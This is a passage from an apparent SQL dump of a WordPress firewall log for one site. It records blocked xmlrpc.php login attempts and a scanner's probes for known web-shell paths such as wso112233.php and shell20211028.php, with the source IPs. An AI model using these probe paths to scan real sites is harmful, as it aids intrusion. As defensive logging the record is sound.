Safari\\/537.36\"}','KyOi0ahzXef5vYj31EmbprAC',0,1679852025.2632,540,'','POST',403,0,515,0,1,'',0),('34.172.150.73',581736009,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','RJKfSXInzyi5gp9QjVWxGw80',0,1679852039.2070,581,'','POST',403,0,515,0,1,'',0),('107.180.77.81',1806978385,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.1 (KHTML, like Gecko) Chrome\\/21.0.1180.83 Safari\\/537.1\"}','8EdGPQqzgWISYhkwsV71ClrN',0,1679852051.8196,576,'','POST',403,0,515,0,1,'',0),('143.198.157.238',2412158446,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.90 Safari\\/537.36\"}','QuZhnF1rctpM26IgBV8Rokvl',0,1679852062.6441,1114,'','POST',403,0,515,0,1,'',0),('213.205.38.23',3586991639,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','YTzuSJF6dmglWI95xtoiD31Q',0,1679852063.0568,1011,'','POST',403,0,515,0,1,'',0),('202.44.8.48',3391883312,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPad; CPU OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','suVjZpP4AkGQmJDg8YnfwqET',0,1679852070.9547,544,'','POST',403,0,515,0,1,'',0),('5.189.162.27',96313883,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','2lbU7wpHLxeuriFC4SBW8nAm',0,1679857941.1269,3334,'','POST',403,0,515,0,1,'',0),('68.178.244.46',1152578606,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','AiyGhIrLtDbkUx6dJE5nqpj9',0,1679857942.4681,2180,'','POST',403,0,515,0,1,'',0),('54.195.75.99',918768483,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','Gl5PuRH8M7WvXs1j6aqETt3V',0,1679857947.6910,555,'','POST',403,0,515,0,1,'',0),('152.32.234.87',2552293975,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko\\/20100101 Firefox\\/84.0\"}','rYMhy9DbP3LopWjvwXxKfaVH',0,1679857955.1243,1058,'','POST',403,0,515,0,1,'',0),('74.208.59.155',1255160731,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko\\/20100101 Firefox\\/44.0\"}','qIdSn1RB6NwT2xbVFvEePH7j',0,1679857955.5505,964,'','POST',403,0,515,0,1,'',0),('74.208.59.155',1255160731,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.104 Safari\\/537.36\"}','bkhSpDsIc7tfW4jyE6nMLmAY',0,1679857970.2637,600,'','POST',403,0,515,0,1,'',0),('209.188.18.190',3518763710,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','jpwxPgqrmsy28AdINQ4z7U16',0,1679857979.4101,1470,'','POST',403,0,515,0,1,'',0),('37.97.226.64',627171904,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','qD7J09ReFchNmkxU3Mtl6VKn',0,1679858468.5864,1295,'','POST',403,0,515,0,1,'',0),('164.92.115.99',2757522275,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-N960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','1U0tbWRr4f8PynCe9Y3xKTMu',0,1679858468.9601,1326,'','POST',403,0,515,0,1,'',0),('74.208.59.202',1255160778,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko\\/20050716 Firefox\\/1.0.6\"}','PCDRvqctKd24gS7h3e0rnxBl',0,1679858486.0634,543,'','POST',403,0,515,0,1,'',0),('194.38.23.179',3257276339,'','http://cmdev-site1.com/admin/server/php/index.php?file=tf2rghf.jpg','','{\"1\":\"ALittle Client\"}','RZg736fdWbluBSJIU4vzTyhp',0,1679860626.7830,989,'','GET',403,0,700,0,1,'',0),('194.243.52.182',3270718646,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko\\/20100101 Firefox\\/88.0\"}','9wLIKxY8nARbU7DVJ1XOyPT6',0,1679861812.0882,1872,'','POST',403,0,515,0,1,'',0),('164.92.115.99',2757522275,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','QlsdKIBG79wj0nxbUORqEzr2',0,1679861812.1634,1797,'','POST',403,0,515,0,1,'',0),('167.114.53.55',2809279799,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','RUMJiGF58vtT01was7oVjk9Q',0,1679861825.1076,632,'','POST',403,0,515,0,1,'',0),('95.170.72.254',1604995326,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','rMu06Dlbex9fU8BwEjk3HodL',0,1679861831.3689,698,'','POST',403,0,515,0,1,'',0),('203.205.21.58',3419215162,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.121 Safari\\/537.36\"}','JmcnaSqM8ftHsAxQIGdjKrBy',0,1679861843.2867,538,'','POST',403,0,515,0,1,'',0),('79.137.65.179',1334395315,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','h1EknXBGeHoWJFDZ4vlSc37I',0,1679861854.8166,581,'','POST',403,0,515,0,1,'',0),('203.205.21.58',3419215162,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.198 Safari\\/537.36\"}','7POpFfYHBNXlh2yk9WoA6VT8',0,1679861868.9301,1651,'','POST',403,0,515,0,1,'',0),('202.61.232.172',3393054892,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','0rcpaXPkAfh1YK92sUGWiIgB',0,1679866148.9851,2034,'','POST',403,0,515,0,1,'',0),('107.180.77.81',1806978385,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','MdovpFgkYTVSDmw40XGfirLP',0,1679866148.1927,3457,'','POST',403,0,515,0,1,'',0),('92.205.5.199',1556940231,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','mAunvRHj3JKkfXY69rEUet7q',0,1679866164.9676,1416,'','POST',403,0,515,0,1,'',0),('64.227.108.223',1088646367,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.186 Safari\\/537.36\"}','6IToj7sxGSPWbYRcr0Fd4CLM',0,1679866165.0869,1391,'','POST',403,0,515,0,1,'',0),('37.97.226.64',627171904,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.93 Safari\\/537.36\"}','CpnP5cNFmfudG7AeMVzIb6yj',0,1679866172.4514,565,'','POST',403,0,515,0,1,'',0),('185.243.11.71',3119713095,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','FjPa3Np5mlQdhMtK7erGykS0',0,1679866194.8615,1236,'','POST',403,0,515,0,1,'',0),('185.6.139.121',3104213881,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko\\/20041107 Firefox\\/1.0\"}','H5Owi49zmlrgyPVDq2Xj7cCT',0,1679866196.7038,593,'','POST',403,0,515,0,1,'',0),('156.245.57.130',2633316738,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','atJGFjRxBwc8iNHvoS6DeOf9',0,1679870575.8181,1751,'','POST',403,0,515,0,1,'',0),('68.178.145.146',1152553362,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','ts89LJxw3mDiPEY1qHk0OIFM',0,1679870573.0095,4942,'','POST',403,0,515,0,1,'',0),('92.205.5.199',1556940231,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.71 Safari\\/537.36\"}','DMCS1LUgV28TBFvo6z9XWZO7',0,1679870583.1877,585,'','POST',403,0,515,0,1,'',0),('185.6.139.121',3104213881,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko\\/20100101 Firefox\\/65.0\"}','iDqTd0koYyZm6fgEnJXIWaRV',0,1679870587.7764,585,'','POST',403,0,515,0,1,'',0),('194.243.52.182',3270718646,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','eX56Yt0V3hO4DjWnwuRyKMFi',0,1679870590.6958,610,'','POST',403,0,515,0,1,'',0),('194.243.52.182',3270718646,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.131 Safari\\/537.36\"}','LfSY9NzQ1pUGvF4eHE8KtRrg',0,1679870601.5993,572,'','POST',403,0,515,0,1,'',0),('97.107.133.132',1634436484,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','V8YkoRF64LXr1hS7dsOinWj9',0,1679874874.8577,3667,'','POST',403,0,515,0,1,'',0),('68.178.145.146',1152553362,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','OXjHUm0GuSC4egc612FhtYva',0,1679874880.7718,601,'','POST',403,0,515,0,1,'',0),('5.189.162.27',96313883,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','OQsktPXrybGFhnKVUHjTJ0gp',0,1679874885.6869,1371,'','POST',403,0,515,0,1,'',0),('203.205.21.58',3419215162,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.76 Safari\\/537.36\"}','UrWHJQAb895mCfXV4nEsKhYv',0,1679874885.8450,1228,'','POST',403,0,515,0,1,'',0),('203.205.21.58',3419215162,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.105 Safari\\/537.36\"}','ENx93A4sXBQYPltqekWnaZIy',0,1679874903.9789,1296,'','POST',403,0,515,0,1,'',0),('68.65.123.34',1145142050,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko\\/20100101 Firefox\\/29.0\"}','wVqju2lIT890KYn7WOiSEHdZ',0,1679874910.1007,564,'','POST',403,0,515,0,1,'',0),('200.58.111.21',3359272725,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:36.0) Gecko\\/20100101 Firefox\\/36.0\"}','wKJ7l5ZHePDXGAu8jChzxdkO',0,1679874911.4516,546,'','POST',403,0,515,0,1,'',0),('46.105.97.186',778658234,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','Unr2ZJkLXITiomBjA5SgQ7WY',0,1679874919.9777,556,'','POST',403,0,515,0,1,'',0),('200.58.111.21',3359272725,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:17.0) Gecko\\/20100101 Firefox\\/20.6.14\"}','BnOSaF96qfJIYrejPtA7LNcp',0,1679874931.1324,546,'','POST',403,0,515,0,1,'',0),('167.71.226.185',2806506169,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko\\/20100101 Firefox\\/88.0\"}','xqmJzwlbBQarIicsHV5voySD',0,1679877674.0751,1573,'','POST',403,0,515,0,1,'',0),('175.41.217.33',2938755361,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko\\/20100101 Firefox\\/44.0\"}','QMEeRhzWaAscIfwdiyNpGZo8',0,1679877671.5844,4656,'','POST',403,0,515,0,1,'',0),('45.119.84.18',762795026,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko\\/20050716 Firefox\\/1.0.6\"}','5ARaUwYD7SxdIrLNWoziXC9g',0,1679877679.8366,593,'','POST',403,0,515,0,1,'',0),('107.180.77.81',1806978385,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 6.0.1; RedMi Note 5 Build\\/RB3N5C; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/68.0.3440.91 Mobile Safari\\/537.36\"}','mfjzRFWyl2ibwS84BLdQoZYv',0,1679877682.6742,599,'','POST',403,0,515,0,1,'',0),('178.210.67.162',3000124322,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','kfCGSdJb1jOM43UoNWVDmRzH',0,1679877689.3223,1159,'','POST',403,0,515,0,1,'',0),('175.178.47.143',2947690383,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','YV3mUtvDl9b5LWrFpo0fRQes',0,1679877689.7560,1066,'','POST',403,0,515,0,1,'',0),('82.165.87.111',1386567535,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','ywhO02FgMivobsup7EQex9nL',0,1679877695.6150,564,'','POST',403,0,515,0,1,'',0),('162.14.102.253',2718852861,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko\\/20100101 Firefox\\/88.0\"}','M6JaHnuAqPpbldB8o95rRgF0',0,1679877700.0509,594,'','POST',403,0,515,0,1,'',0),('92.42.111.218',1546285018,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','DzluVA16BxskcWt0dJ7Ebn5h',0,1679877706.9541,2624,'','POST',403,0,515,0,1,'',0),('203.205.21.58',3419215162,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.71 Safari\\/537.36\"}','Oeuvy2Jmtr5kaxpigSnGHsLD',0,1679877711.6127,410,'','POST',404,0,515,0,1,'',0),('185.243.11.71',3119713095,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q720) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','gmF4hGJXByA85IqNi0vufoW2',0,1679883303.3943,5354,'','POST',403,0,515,0,1,'',0),('177.125.60.21',2977774613,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','Wk1cTOMVID3S4eao6xzvALbR',0,1679883315.5037,936,'','POST',403,0,515,0,1,'',0),('54.38.45.49',908471601,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.71 Safari\\/537.36\"}','S2lh5j6pM0RvDTtIbdkAoug3',0,1679883317.0005,729,'','POST',403,0,515,0,1,'',0),('113.190.234.69',1908337221,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A102U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','PH1h5x3NswDrRTC7OWVlpfXq',0,1679883317.8930,804,'','POST',403,0,515,0,1,'',0),('89.163.140.92',1503890524,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.138 Safari\\/537.36\"}','zWkvPsE4f61qe3mhOJQnjCUd',0,1679883331.3226,600,'','POST',403,0,515,0,1,'',0),('188.166.86.232',3165017832,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','KoLr3wizRNBc0AMmekHFudOy',0,1679883335.3464,679,'','POST',403,0,515,0,1,'',0),('45.119.84.18',762795026,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','1FWXCpyJL7u49UYMKQwigqNP',0,1679883342.5373,668,'','POST',403,0,515,0,1,'',0),('177.125.60.21',2977774613,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','zqhDYUyZncuCd4P3Tvb5kHQl',0,1679883353.9920,580,'','POST',403,0,515,0,1,'',0),('89.43.65.194',1496007106,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.71 Safari\\/537.36\"}','1fVItrANMKB2Z5e9J0CbOShP',0,1679883356.4290,640,'','POST',403,0,515,0,1,'',0),('152.32.234.87',2552293975,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','24xfCRS5rgpNDGOL7inH0b6d',0,1679887777.0097,4824,'','POST',403,0,515,0,1,'',0),('194.243.52.182',3270718646,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','lzgd5t8PrxBia63KwmM7hjID',0,1679887779.6704,2162,'','POST',403,0,515,0,1,'',0),('68.178.202.137',1152567945,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','NeimctLJFDE89WHTzjRfSZpk',0,1679887785.2197,646,'','POST',403,0,515,0,1,'',0),('54.38.45.49',908471601,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','JZGpW4H1vIBiM9CwfxmUVcLA',0,1679887792.6663,1089,'','POST',403,0,515,0,1,'',0),('97.107.133.132',1634436484,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.90 Safari\\/537.36\"}','eTCvF3OPt4gAKoyIiLaj6Dpw',0,1679887792.1161,2035,'','POST',403,0,515,0,1,'',0),('63.250.38.213',1073358549,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.104 Safari\\/537.36\"}','kBR845iZ7Pz1xWabfF9H20oG',0,1679887804.8545,3150,'','POST',403,0,515,0,1,'',0),('107.180.77.81',1806978385,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.198 Safari\\/537.36\"}','oBbSxri5qDU6EO4gY2Pc1ma9',0,1679887815.9077,862,'','POST',403,0,515,0,1,'',0),('8.210.217.51',148035891,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko\\/20041107 Firefox\\/1.0\"}','tZHfdhJQmjaqzSKwg3XOiEbx',0,1679887824.2781,582,'','POST',403,0,515,0,1,'',0),('184.168.99.50',3098043186,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko\\/20100101 Firefox\\/84.0\"}','kWRvjopeXdfNHIyK8EPc4tzm',0,1679887835.6030,561,'','POST',403,0,515,0,1,'',0),('173.255.253.114',2919234930,'','http://cmdev-site1.com//wp-content/plugins/ccx/index.php','','{\"1\":\"Go-http-client\\/1.1\"}','nkGRu4TPwgbH7avZhUDrC9If',0,1679889702.0785,1500,'','GET',403,0,700,0,1,'',0),('173.255.253.114',2919234930,'','http://cmdev-site1.com/ccx/index.php','','{\"1\":\"Go-http-client\\/1.1\"}','cwpCkKRDjMstWX5zb3N0m8ir',0,1679889703.7830,276,'','GET',403,0,700,0,1,'',0),('173.255.253.114',2919234930,'','http://cmdev-site1.com/wp-content/themes/ccx/index.php','','{\"1\":\"Go-http-client\\/1.1\"}','4hTjeFiXSpgocBLvZ1bHqd2A',0,1679889704.2531,279,'','GET',403,0,700,0,1,'',0),('173.255.253.114',2919234930,'','http://cmdev-site1.com/shell20211028.php','','{\"1\":\"Go-http-client\\/1.1\"}','0sV1zrqae9MGwE2AoHKyYD73',0,1679889704.7165,274,'','GET',403,0,700,0,1,'',0),('173.255.253.114',2919234930,'','http://cmdev-site1.com/wp-includes/shell20211028.php','','{\"1\":\"Go-http-client\\/1.1\"}','6mGUk42yMfZOiLrKpNJQaxgu',0,1679889705.1849,276,'','GET',403,0,700,0,1,'',0),('173.255.253.114',2919234930,'','http://cmdev-site1.com/wp-admin/shell20211028.php','','{\"1\":\"Go-http-client\\/1.1\"}','LNOWnajl9uFP5ebRpCTycH0D',0,1679889705.6696,293,'','GET',403,0,700,0,1,'',0),('173.255.253.114',2919234930,'','http://cmdev-site1.com/wp-content/shell20211028.php','','{\"1\":\"Go-http-client\\/1.1\"}','18xXr4YFCK7TMyNgaSUfjQGW',0,1679889706.1588,273,'','GET',403,0,700,0,1,'',0),('173.255.253.114',2919234930,'','http://cmdev-site1.com/wso112233.php','','{\"1\":\"Go-http-client\\/1.1\"}','mlCbgitdO8L3GKfj2hPTEncy',0,1679889706.6361,283,'','GET',403,0,700,0,1,'',0),('173.255.253.114',2919234930,'','http://cmdev-site1.com/wsoyanzorng.php','','{\"1\":\"Go-http-client\\/1.1\"}','9LmDnOiF31yZ4JIvRPH6UfYt',0,1679889707.1287,288,'','GET',403,0,700,0,1,'',0),('173.255.253.114',2919234930,'','http://cmdev-site1.com//wp-content/uploads/ac_assets/IndoSec.php%20','','{\"1\":\"Go-http-client\\/1.1\"}','G4Dbl5mOZktpiua2AF8RXMS9',0,1679889707.6143,285,'','GET',403,0,700,0,1,'',0),('177.125.60.21',2977774613,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','1Xdn8ySiHJo2khqvmuax9R6B',0,1679892367.2431,1629,'','POST',403,0,515,0,1,'',0),('185.182.57.16',3115727120,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','iNPrQ8hsOoqFHAaWXy31L7Ef',0,1679892372.3333,1630,'','POST',403,0,515,0,1,'',0),('5.255.98.122',100622970,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.131 Safari\\/537.36\"}','NMpZOmcGrXeDQwCt65I2bWSu',0,1679892372.9540,2212,'','POST',403,0,515,0,1,'',0),('107.180.77.81',1806978385,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','7CzPwaNWdvDfVA5JtcTEHbkh',0,1679892378.5934,668,'','POST',403,0,515,0,1,'',0),('95.167.178.158',1604825758,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 